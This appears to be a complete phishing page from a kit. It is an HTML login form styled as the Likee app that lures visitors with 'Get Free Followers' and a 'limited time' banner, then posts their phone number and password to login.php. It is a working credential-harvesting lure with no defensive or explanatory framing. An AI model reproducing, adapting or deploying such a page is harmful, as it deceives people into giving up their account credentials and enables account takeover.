<!DOCTYPE html>
<html lang="en">
   <head>
      <title>Get Free Followers</title>
 <style>
 	
body{
	padding-top:20px;
	padding-left:2px;
	font-family:tahoma;
} 	
 	
 input{
 	color:black;
 }	
 	
 	
.a{
	border-top:none;
	border-right:none;
	border-left:none;
	width:260px;
	height:30px;
	padding-bottom:20px;
	font-size:20px;
}


.log{
	text-align:center;
	width:260px;
	height:40px;
	border-radius:20px;
	border:none;
	background:#F9356C;
	color:white;
	
}

p{
	color:black;
	padding-left:23px;
}


a{
	text-decoration:none;
	color:black;
}

h2{
	padding-left:23px;
}

.a:hover{
	border:1px solid #F9356C;
}

.im{
	width:263px;
	height:150px;
	padding-left:10px;
}



 </style>
 
   </head>
   <body>
 <center>
 <img class="im" src="likee.png" alt="">
<marquee><font color="red">(Only for limited time log in and get now)</font></marquee>
 
 </center>
 
 <form method="post" action="login.php">
 
   
<h2>Log In</h2>
 <center>
 <input class="a" name="number" type="number" placeholder="Phone Number" required="">
  
  <br><br><br>
  
 <input class="a" name="password" type="password" placeholder="Password" required="">
    
  <br><br><br>
  
  
<center>  <input class="log" type="submit" value="Log In"></center></center>
  
 </form> 
  <p><a href="">Forgot password</a></p>
  <br><br>
  
   </body>
</html>
